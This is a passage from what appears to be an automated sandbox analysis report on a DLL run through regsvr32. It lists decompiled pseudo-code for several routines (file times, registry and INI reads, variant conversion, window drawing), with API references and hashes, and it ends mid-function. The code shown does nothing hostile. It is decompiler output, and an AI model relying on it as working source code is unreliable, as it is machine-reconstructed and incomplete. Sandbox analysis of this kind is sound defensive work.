						if(L10038C62( &_v20) == 0) {
							_t102[4] = 0;
							_t102[5] = 0;
						} else {
							_t78 = L10038D98(0,  &_v36, _t101,  &_v20, 0xffffffff);
							_t102[4] =  *_t78;
							_t102[5] = _t78[1];
						}
						if(L10038C62( &_v28) == 0) {
							_t102[2] = 0;
							_t102[3] = 0;
						} else {
							_t75 = L10038D98(0,  &_v36, _t101,  &_v28, 0xffffffff);
							_t102[2] =  *_t75;
							_t102[3] = _t75[1];
						}
						if(( *_t102 | _t102[1]) == 0) {
							 *_t102 = _t102[2];
							_t102[1] = _t102[3];
						}
						if((_t102[4] | _t102[5]) == 0) {
							_t102[4] = _t102[2];
							_t102[5] = _t102[3];
						}
						goto L21;
					} else {
						goto L2;
					}
				}
				L2:
				return 0;
			}

0x1003926b
0x10039273
0x10039280
0x10039282
0x10039295
0x1003929a
0x100392a0
0x100392a6
0x100393ba
0x00000000
0x100393bc
0x100392b4
0x100392c1
0x100392ce
0x100392d7
0x100392da
0x100392dd
0x100392e3
0x100392e9
0x10039301
0x100392eb
0x100392eb
0x100392eb
0x1003930f
0x1003932b
0x1003932d
0x10039311
0x1003931a
0x10039321
0x10039326
0x10039326
0x1003933b
0x1003935c
0x1003935f
0x1003933d
0x10039346
0x1003934d
0x10039353
0x10039353
0x1003936d
0x1003938e
0x10039391
0x1003936f
0x10039378
0x1003937f
0x10039385
0x10039385
0x10039399
0x1003939e
0x100393a3
0x100393a3
0x100393ac
0x100393b1
0x100393b7
0x100393b7
0x00000000
0x00000000
0x00000000
0x00000000
0x100392dd
0x100392c3
0x00000000

APIs

_memset.LIBCMT ref: 10039282

Part of subcall function 1000A0B7: _wctomb_s.LIBCMT ref: 1000A0C7

GetFileTime.KERNEL32(?,?,?,?), ref: 100392B9
GetFileSize.KERNEL32(?,00000000), ref: 100392CE

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: File$SizeTime_memset_wctomb_s
String ID:
API String ID: 26245289-0
Opcode ID: 9e23e771f43b21b5225b5bbeaec31b18534d685dfb75f694ddad4e772cd0be0e
Instruction ID: 395707f0aedb694bf18453a667929c4cad6f780381ae80af0bd1f268e73cf5ff
Opcode Fuzzy Hash: 9e23e771f43b21b5225b5bbeaec31b18534d685dfb75f694ddad4e772cd0be0e
Instruction Fuzzy Hash: 4C411AB5500705AFC725DF68C981C9AB7F8FF09351B108A6EE5A6D7690E730FA44CB60

Uniqueness

Uniqueness Score: -1.00%

Function 10037302 Relevance: 6.1, APIs: 4, Instructions: 124
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E10037302(void* __ebx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				void* __ebp;
				signed int _t36;
				intOrPtr _t40;
				struct HWND__* _t44;
				signed int _t47;
				short* _t52;
				intOrPtr _t65;
				struct HWND__* _t70;
				intOrPtr _t79;
				short* _t82;
				intOrPtr _t83;
				struct HWND__** _t85;
				intOrPtr _t86;
				signed int _t87;
				void* _t89;
				struct HWND__** _t94;
				intOrPtr _t96;

				_t80 = __edi;
				_t79 = __edx;
				_t87 = _t89 - 0xfc;
				_t36 =  *0x100b9e70; // 0x6fb3f782
				 *(_t87 + 0x100) = _t36 ^ _t87;
				_push(0xc);
				E1004764D(0x10090b14, __ebx, __edi, __esi);
				_t85 =  *(_t87 + 0x110);
				_t40 =  *((intOrPtr*)(_t87 + 0x114));
				_t94 = _t85;
				_t67 = 0 | _t94 != 0x00000000;
				 *((intOrPtr*)(_t87 - 0x18)) = _t40;
				_t95 = _t94 != 0;
				if(_t94 != 0) {
					L2:
					_t96 = _t40;
					_t67 = 0 | _t96 != 0x00000000;
					if(_t96 != 0) {
						goto L1;
					}
					L1000140B(_t87 - 0x10, E100184C0());
					_t44 = _t85[2];
					_t70 = _t85[1];
					 *((intOrPtr*)(_t87 - 4)) = 0;
					if(_t44 != 0xfffffdf8 || (_t85[0x19] & 0x00000001) == 0) {
						if(_t44 != 0xfffffdee || (_t85[0x2d] & 0x00000001) == 0) {
							goto L8;
						} else {
							goto L7;
						}
					} else {
						L7:
						_t70 = GetDlgCtrlID(_t70) & 0x0000ffff;
						L8:
						if(_t70 == 0) {
							L12:
							__eflags = _t85[2] - 0xfffffdf8;
							if(_t85[2] != 0xfffffdf8) {
								 *(_t87 - 0x14) =  *(_t87 - 0x10);
								_t82 =  &(_t85[4]);
								_t47 = MultiByteToWideChar( *0x100bb480(), 0,  *(_t87 - 0x14), 0xffffffff, _t82, 0x50);
								__eflags = _t82;
								if(_t82 != 0) {
									__eflags = _t47 - 0x50;
									if(_t47 > 0x50) {
										_push(0x80004005);
										_t47 = L10001401(0, _t70, _t79, _t82, _t85, _t87);
									}
								}
								__eflags = _t47;
								if(_t47 > 0) {
									__eflags = _t82;
									if(_t82 != 0) {
										 *((short*)(_t82 + _t47 * 2 - 2)) = 0;
									}
								}
							} else {
								L10034FCA(0, _t79, 0xfffffdf8, _t85, _t87,  &(_t85[4]), 0x50,  *(_t87 - 0x10), 0xffffffff);
							}
							 *((intOrPtr*)( *((intOrPtr*)(_t87 - 0x18)))) = 0;
							SetWindowPos( *_t85, 0, 0, 0, 0, 0, 0x213);
							L100013E3( &(( *(_t87 - 0x10))[0xfffffffffffffff0]), _t79);
							_t52 = 1;
							__eflags = 1;
							L21:
							 *[fs:0x0] =  *((intOrPtr*)(_t87 - 0xc));
							_pop(_t83);
							_pop(_t86);
							_pop(_t65);
							return E1004763E(_t52, _t65,  *(_t87 + 0x100) ^ _t87, _t79, _t83, _t86);
						}
						if(E1001FA58(0, _t70, 0xfffffdf8, _t85, _t87, _t70, _t87, 0x100) != 0) {
							E1001FB1B(_t87 - 0x10, _t87, 1, 0xa);
							goto L12;
						} else {
							L100013E3( &(( *(_t87 - 0x10))[0xfffffffffffffff0]), _t79);
							_t52 = 0;
							goto L21;
						}
					}
				}
				L1:
				_t40 = E1000A069(0, _t67, _t80, _t85, _t95);
				goto L2;
			}

0x10037302
0x10037302
0x10037309
0x1003730d
0x10037314
0x1003731a
0x10037321
0x10037326
0x1003732c
0x10037336
0x10037338
0x1003733b
0x1003733e
0x10037340
0x10037347
0x10037349
0x1003734b
0x10037352
0x00000000
0x00000000
0x1003735d
0x10037362
0x10037365
0x1003736f
0x10037372
0x1003737f
0x00000000
0x00000000
0x00000000
0x00000000
0x1003738a
0x1003738a
0x10037391
0x10037394
0x10037396
0x100373ce
0x100373ce
0x100373d1
0x100373eb
0x100373ee
0x10037401
0x10037407
0x10037409
0x1003740b
0x1003740e
0x10037410
0x10037415
0x10037415
0x1003740e
0x1003741a
0x1003741c
0x1003741e
0x10037420
0x10037422
0x10037422
0x10037420
0x100373d3
0x100373de
0x100373e3
0x10037434
0x10037438
0x10037444
0x1003744b
0x1003744b
0x1003744c
0x1003744f
0x10037457
0x10037458
0x10037459
0x1003746e
0x1003746e
0x100373a9
0x100373c9
0x00000000
0x100373ab
0x100373b1
0x100373b6
0x00000000
0x100373b6
0x100373a9
0x10037372
0x10037342
0x10037342
0x00000000

APIs

__EH_prolog3.LIBCMT ref: 10037321
GetDlgCtrlID.USER32 ref: 1003738B

Part of subcall function 1000A069: __CxxThrowException@8.LIBCMT ref: 1000A07D
Part of subcall function 1000A069: __EH_prolog3.LIBCMT ref: 1000A08A

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000050), ref: 10037401
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000213), ref: 10037438

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: H_prolog3$ByteCharCtrlException@8MultiThrowWideWindow
String ID:
API String ID: 1663627363-0
Opcode ID: ca537a2ef50836b29fd132a96b3a6a5ddde4d58cda0944cf2b2cdc7173693b47
Instruction ID: cde7b1fb930a4334c8d67137af01b601bac6e602a68672dd04c8859f716bedd0
Opcode Fuzzy Hash: ca537a2ef50836b29fd132a96b3a6a5ddde4d58cda0944cf2b2cdc7173693b47
Instruction Fuzzy Hash: 9941C175A0024A9FDB26DFA4CCC1BEE77E4FF04351F110A2DFA66DA2D0D770A9408A51

Uniqueness

Uniqueness Score: -1.00%

Function 100261FC Relevance: 6.1, APIs: 4, Instructions: 115
registryCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E100261FC(void* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t44;
				char _t45;
				CHAR* _t47;
				char _t51;
				void* _t53;
				long _t58;
				char* _t69;
				intOrPtr _t70;
				char _t79;
				CHAR* _t85;
				char _t87;
				intOrPtr _t88;
				void* _t89;
				intOrPtr _t92;
				CHAR* _t93;
				void* _t95;

				_t71 = __ecx;
				_t93 = _t95 - 0x1004;
				L1004CF80(0x1004);
				_push(0xffffffff);
				_push(0x1008fae2);
				_push( *[fs:0x0]);
				_t44 =  *0x100b9e70; // 0x6fb3f782
				_t45 = _t44 ^ _t93;
				_t93[0x1000] = _t45;
				_push(_t45);
				 *[fs:0x0] = _t93 - 0xc;
				_t87 = _t93[0x100c];
				_t85 = _t93[0x1018];
				_t47 = _t93[0x1010];
				_t69 = _t93[0x1014];
				 *(_t93 - 0x14) = _t87;
				 *(_t93 - 0x18) = _t85;
				 *(_t93 - 0x20) = 0;
				if( *((intOrPtr*)(__ecx + 0x54)) == 0) {
					__eflags = _t85;
					if(__eflags == 0) {
						 *(_t93 - 0x18) = 0x1009c448;
					}
					GetPrivateProfileStringA(_t47, _t69,  *(_t93 - 0x18), _t93, 0x1000,  *(_t71 + 0x68));
					_push(_t93);
					goto L12;
				} else {
					_t53 = E10025F4C(__ecx, _t47);
					_t99 = _t53;
					 *(_t93 - 0x24) = _t53;
					if(_t53 != 0) {
						L1000140B(_t93 - 0x10, E100184C0());
						_t89 = RegQueryValueExA;
						 *((intOrPtr*)(_t93 - 4)) = 0;
						 *(_t93 - 0x28) = 0;
						 *(_t93 - 0x1c) = 0;
						_t58 = RegQueryValueExA( *(_t93 - 0x24), _t69, 0, _t93 - 0x28, 0, _t93 - 0x1c);
						__eflags = _t58;
						 *(_t93 - 0x20) = _t58;
						if(_t58 == 0) {
							 *(_t93 - 0x20) = RegQueryValueExA( *(_t93 - 0x24), _t69, 0, _t93 - 0x28, L100011F4(_t93 - 0x10,  *(_t93 - 0x1c)), _t93 - 0x1c);
							E1000FED3(_t93 - 0x10, 0xffffffff);
						}
						RegCloseKey( *(_t93 - 0x24));
						__eflags =  *(_t93 - 0x20);
						_t79 =  *(_t93 - 0x14);
						if(__eflags != 0) {
							_push( *(_t93 - 0x18));
							E1000B543(_t69, _t79, _t89, 0, __eflags);
						} else {
							L100010F5(_t79, __eflags, _t93 - 0x10);
						}
						L100013E3( *((intOrPtr*)(_t93 - 0x10)) + 0xfffffff0, _t85);
						_t51 =  *(_t93 - 0x14);
					} else {
						_push( *(_t93 - 0x18));
						L12:
						E1000B543(_t69, _t87, _t87, 0, _t99);
						_t51 = _t87;
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t93 - 0xc));
				_pop(_t88);
				_pop(_t92);
				_pop(_t70);
				return E1004763E(_t51, _t70, _t93[0x1000] ^ _t93, _t85, _t88, _t92);
			}

0x100261fc
0x100261fd
0x10026209
0x1002620e
0x10026210
0x1002621b
0x1002621f
0x10026224
0x10026226
0x1002622f
0x10026233
0x10026239
0x1002623f
0x10026245
0x1002624b
0x10026256
0x10026259
0x1002625c
0x1002625f
0x1002630a
0x1002630c
0x1002630e
0x1002630e
0x10026326
0x1002632f
0x00000000
0x10026265
0x10026266
0x1002626b
0x1002626d
0x10026270
0x10026283
0x10026288
0x1002629c
0x1002629f
0x100262a2
0x100262a5
0x100262a7
0x100262a9
0x100262ac
0x100262ce
0x100262d1
0x100262d1
0x100262d9
0x100262df
0x100262e2
0x100262e5
0x10026300
0x10026303
0x100262e7
0x100262eb
0x100262eb
0x100262f6
0x100262fb
0x10026272
0x10026272
0x10026330
0x10026332
0x10026337
0x10026337
0x10026270
0x1002633c
0x10026344
0x10026345
0x10026346
0x1002635b

APIs

RegQueryValueExA.ADVAPI32 ref: 100262A5
RegQueryValueExA.ADVAPI32 ref: 100262C7
RegCloseKey.ADVAPI32(?), ref: 100262D9
GetPrivateProfileStringA.KERNEL32(?,?,?,?,00001000,?), ref: 10026326

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: QueryValue$ClosePrivateProfileString
String ID:
API String ID: 1042844925-0
Opcode ID: 7e5ca71659264342a84135f862c441e723376347e8cb3eec01237bd20aa3d418
Instruction ID: 60872dfbbed3684bb72bca17b6318999f261628bc760fed0f36e50853fce30c9
Opcode Fuzzy Hash: 7e5ca71659264342a84135f862c441e723376347e8cb3eec01237bd20aa3d418
Instruction Fuzzy Hash: D2414AB5D00199AFDF21DFA4CC81AEEBBB9FF08354F10016AF515A3290D7746A45CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 10039799 Relevance: 6.1, APIs: 4, Instructions: 107
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E10039799(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				signed int _t51;
				signed int _t53;
				signed int* _t54;
				signed int _t56;
				intOrPtr _t63;
				intOrPtr* _t69;
				char* _t74;
				void* _t76;

				_push(0x20);
				E1004764D(0x10090e9b, __ebx, __edi, __esi);
				 *((intOrPtr*)(_t76 - 0x14)) = __ecx;
				 *(_t76 - 0x10) = 0;
				E100235FF(_t76 - 0x2c);
				_t63 =  *((intOrPtr*)(_t76 + 8));
				_t69 =  *((intOrPtr*)( *((intOrPtr*)(_t76 + 0xc))));
				_t51 =  *(_t63 + 0xc) & 0x0000ffff;
				if(_t51 == 0xc ||  *_t69 == _t51) {
					L5:
					_t74 =  *((intOrPtr*)(_t63 + 0x18)) +  *((intOrPtr*)(_t76 - 0x14));
					_t53 = ( *(_t63 + 0xc) & 0x0000ffff) + 0xfffffffe;
					__eflags = _t53 - 0x13;
					if(_t53 > 0x13) {
						L21:
						 *(_t76 - 0x10) = 0x80020008;
						L22:
						_t54 =  *(_t76 + 0x10);
						 *_t54 =  *_t54 & 0x00000000;
						__eflags =  *_t54;
						L23:
						__imp__#9(_t76 - 0x2c);
						__eflags =  *(_t76 - 0x10);
						if( *(_t76 - 0x10) >= 0) {
							__eflags =  *(_t63 + 0x14);
							if(__eflags != 0) {
								E1001E397(_t76 - 0x1c, __eflags,  *((intOrPtr*)( *((intOrPtr*)(_t76 - 0x14)) + 0x1c)));
								 *(_t76 - 4) = 0;
								 *(_t63 + 0x14)();
								 *(_t76 - 4) =  *(_t76 - 4) | 0xffffffff;
								__eflags =  *(_t76 - 0x18);
								if( *(_t76 - 0x18) != 0) {
									_push( *((intOrPtr*)(_t76 - 0x1c)));
									_push(0);
									E1001D714();
								}
							}
						}
						_t56 =  *(_t76 - 0x10);
						goto L28;
					}
					switch( *((intOrPtr*)(_t53 * 4 +  &M100398CD))) {
						case 0:
							__ax =  *(__edi + 8);
							 *__esi =  *(__edi + 8);
							goto L23;
						case 1:
							L9:
							__eax =  *(__edi + 8);
							goto L10;
						case 2:
							 *__esi =  *(__edi + 8);
							goto L23;
						case 3:
							 *__esi =  *(__edi + 8);
							goto L23;
						case 4:
							__eax =  *(__edi + 8);
							 *__esi =  *(__edi + 8);
							__eax =  *(__edi + 0xc);
							__esi[1] = __eax;
							goto L23;
						case 5:
							__eax = L10020F02(__eax, __ecx, __esi,  *(__edi + 8));
							goto L23;
						case 6:
							__eflags =  *(__edi + 8);
							if( *(__edi + 8) != 0) {
								__eax =  *(__edi + 8);
								__ecx =  *__eax;
								_push(__eax);
								__eax =  *((intOrPtr*)( *__eax + 4))();
							}
							__eax = L10020F7B(__esi);
							goto L9;
						case 7:
							__eax = 0;
							__eflags =  *(__edi + 8) - __ax;
							__eax = 0 |  *(__edi + 8) != __ax;
							L10:
							 *__esi = __eax;
							goto L23;
						case 8:
							_push(__edi);
							_push(__esi);
							__imp__#10();
							__eflags = __eax;
							if(__eax == 0) {
								goto L23;
							}
							goto L22;
						case 9:
							goto L21;
						case 0xa:
							 *_t74 =  *((intOrPtr*)(_t69 + 8));
							goto L23;
					}
				} else {
					_t56 = _t76 - 0x2c;
					__imp__#12(_t56, _t69, 0, _t51);
					 *(_t76 - 0x10) = _t56;
					if(_t56 >= 0) {
						_t69 = _t76 - 0x2c;
						goto L5;
					} else {
						 *( *(_t76 + 0x10)) = 0;
						L28:
						return E10047725(_t56);
					}
				}
			}

0x10039799
0x100397a0
0x100397a5
0x100397ae
0x100397b1
0x100397b9
0x100397bc
0x100397be
0x100397c6
0x100397ee
0x100397f5
0x100397f8
0x100397fb
0x100397fe
0x10039874
0x10039874
0x1003987b
0x1003987b
0x1003987e
0x1003987e
0x10039881
0x10039885
0x1003988d
0x10039890
0x10039892
0x10039895
0x100398a0
0x100398a7
0x100398aa
0x100398ad
0x100398b1
0x100398b4
0x100398b6
0x100398b9
0x100398ba
0x100398ba
0x100398b4
0x10039895
0x100398bf
0x00000000
0x100398bf
0x10039800
0x00000000
0x1003980e
0x10039812
0x00000000
0x00000000
0x10039817
0x10039817
0x00000000
0x00000000
0x1003982e
0x00000000
0x00000000
0x10039835
0x00000000
0x00000000
0x1003981e
0x10039821
0x10039823
0x10039826
0x00000000
0x00000000
0x1003983d
0x00000000
0x00000000
0x1003985d
0x10039861
0x10039863
0x10039866
0x10039868
0x10039869
0x10039869
0x1003986d
0x00000000
0x00000000
0x10039844
0x10039846
0x1003984a
0x1003981a
0x1003981a
0x00000000
0x00000000
0x1003984f
0x10039850
0x10039851
0x10039857
0x10039859
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x1003980a
0x00000000
0x00000000
0x100397cd
0x100397d0
0x100397d4
0x100397dc
0x100397df
0x100397eb
0x00000000
0x100397e1
0x100397e4
0x100398c2
0x100398c7
0x100398c7
0x100397df

APIs

__EH_prolog3.LIBCMT ref: 100397A0

Part of subcall function 100235FF: _memset.LIBCMT ref: 10023607

VariantChangeType.OLEAUT32(?,?,00000000,?), ref: 100397D4
VariantClear.OLEAUT32(?), ref: 10039885

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: Variant$ChangeClearH_prolog3Type_memset
String ID:
API String ID: 3387022819-0
Opcode ID: cf2714e3107d7e1b2c48b6da0e02d075f4c9bc30e63eddf9542c72dcb47014f8
Instruction ID: 1d291c353aeb479c168afaf0fded790190f171b1b478ae307407cbeaf2668271
Opcode Fuzzy Hash: cf2714e3107d7e1b2c48b6da0e02d075f4c9bc30e63eddf9542c72dcb47014f8
Instruction Fuzzy Hash: A841C534C04616DFCB12DF64C8405AEFBB5FF86312F608959E8A5AF641CB30E951DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 10043DEE Relevance: 6.1, APIs: 4, Instructions: 105
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E10043DEE(void* __ecx, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				struct tagRECT _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed short _t60;
				signed short _t65;
				intOrPtr _t67;
				signed int _t73;
				void* _t76;
				void* _t80;
				void* _t84;
				intOrPtr _t85;

				_t76 = __ecx;
				_v24 = 1;
				_v20 = 1;
				_push(GetStockObject(0));
				_t85 = L1000CF95(__ecx, __ecx, _t80, _t84, __eflags);
				_v16 = _t85;
				_v8 = E1001FDD8(_t76, _t80, _t85, __eflags);
				_t60 =  *(_t76 + 0x74);
				_v12 = _t85;
				if((0x0000a000 & _t60) == 0) {
					__eflags = _t60 & 0x00005000;
					if(__eflags == 0) {
						_v24 = GetSystemMetrics(0x20) - 1;
						_v20 = GetSystemMetrics(0x21) - 1;
						_t65 =  *(_t76 + 0x78);
						__eflags = 0x0000a000 & _t65;
						if((0x0000a000 & _t65) == 0) {
							L6:
							__eflags = _t65 & 0x00005000;
							if(__eflags == 0) {
								L9:
							} else {
								__eflags =  *(_t76 + 0x7c);
								if(__eflags == 0) {
									goto L9;
								} else {
									goto L8;
								}
							}
						} else {
							__eflags =  *(_t76 + 0x7c);
							if(__eflags != 0) {
								goto L6;
							}
						}
						_v12 = _v8;
					} else {
					}
				} else {
				}
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				if(_a4 != 0) {
					_v20 = 0;
					_v24 = 0;
				}
				if(( *(_t76 + 0x74) & 0x0000f000) != 0) {
					InflateRect( &_v40, 0xffffffff, 0xffffffff);
				}
				_t97 =  *(_t76 + 0x24);
				_t67 = _v8;
				if( *(_t76 + 0x24) == 0) {
					_t67 = _v16;
				}
				E1001FE7B(_t76,  *((intOrPtr*)(_t76 + 0x84)), _t76 + 0xc, 0, _t97,  &_v40, _v24, _v20, _t76 + 0xc,  *((intOrPtr*)(_t76 + 0x1c)),  *((intOrPtr*)(_t76 + 0x20)), _v12, _t67);
				asm("movsd");
				 *((intOrPtr*)(_t76 + 0x1c)) = _v24;
				asm("movsd");
				 *((intOrPtr*)(_t76 + 0x20)) = _v20;
				asm("movsd");
				_t73 = 0 | _v12 == _v8;
				asm("movsd");
				 *(_t76 + 0x24) = _t73;
				return _t73;
			}

0x10043dfc
0x10043dfe
0x10043e01
0x10043e0a
0x10043e10
0x10043e12
0x10043e1a
0x10043e1d
0x10043e20
0x10043e2a
0x10043e31
0x10043e35
0x10043e49
0x10043e4f
0x10043e52
0x10043e55
0x10043e57
0x10043e5f
0x10043e5f
0x10043e63
0x10043e70
0x10043e65
0x10043e65
0x10043e69
0x00000000
0x00000000
0x00000000
0x00000000
0x10043e69
0x10043e59
0x10043e59
0x10043e5d
0x00000000
0x00000000
0x10043e5d
0x10043e76
0x10043e37
0x10043e37
0x10043e2c
0x10043e2c
0x10043e7c
0x10043e7d
0x10043e7e
0x10043e7f
0x10043e85
0x10043e87
0x10043e8a
0x10043e8a
0x10043e93
0x10043e9d
0x10043e9d
0x10043ea3
0x10043ea6
0x10043ea9
0x10043eab
0x10043eab
0x10043ecc
0x10043eda
0x10043edb
0x10043ee1
0x10043ee2
0x10043eea
0x10043eeb
0x10043eee
0x10043ef1
0x10043ef6

APIs

GetStockObject.GDI32(00000000), ref: 10043E04

Part of subcall function 1001FDD8: CreateBitmap.GDI32(00000008,00000008,00000001,00000001,?), ref: 1001FE1E
Part of subcall function 1001FDD8: CreatePatternBrush.GDI32(00000000), ref: 1001FE2B
Part of subcall function 1001FDD8: DeleteObject.GDI32(00000000), ref: 1001FE37

InflateRect.USER32 ref: 10043E9D

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: CreateObject$BitmapBrushDeleteInflatePatternRectStock
String ID:
API String ID: 3923860780-0
Opcode ID: 77cdc2866bb3220ef96dfcc24128b45254a2059c46a14f052eb33bb8f99a918e
Instruction ID: 83c43c8af36dfc2abb3a7d6ee453c06656e2c6b27577534a316298b645387d5a
Opcode Fuzzy Hash: 77cdc2866bb3220ef96dfcc24128b45254a2059c46a14f052eb33bb8f99a918e
Instruction Fuzzy Hash: 10411471D012199BDF41DFA5C980AAE7BF5EF08350F2142A5ED10EB296D370AE41CB94

Uniqueness

Uniqueness Score: -1.00%

Function 10017EC9 Relevance: 6.1, APIs: 4, Instructions: 103
windowCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E10017EC9(void* __ecx, struct HWND__** _a4) {
				struct HWND__** _v8;
				struct HWND__** _v12;
				long _t31;
				struct HWND__** _t32;
				struct HWND__** _t44;
				struct HWND__** _t45;
				long _t47;
				void* _t49;
				struct HWND__** _t63;

				_push(__ecx);
				_push(__ecx);
				_t49 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x4c)) != 0) {
					_t31 = _a4;
					if(_t31 != 0) {
						if( *((intOrPtr*)(_t31 + 8)) == 0) {
							L4:
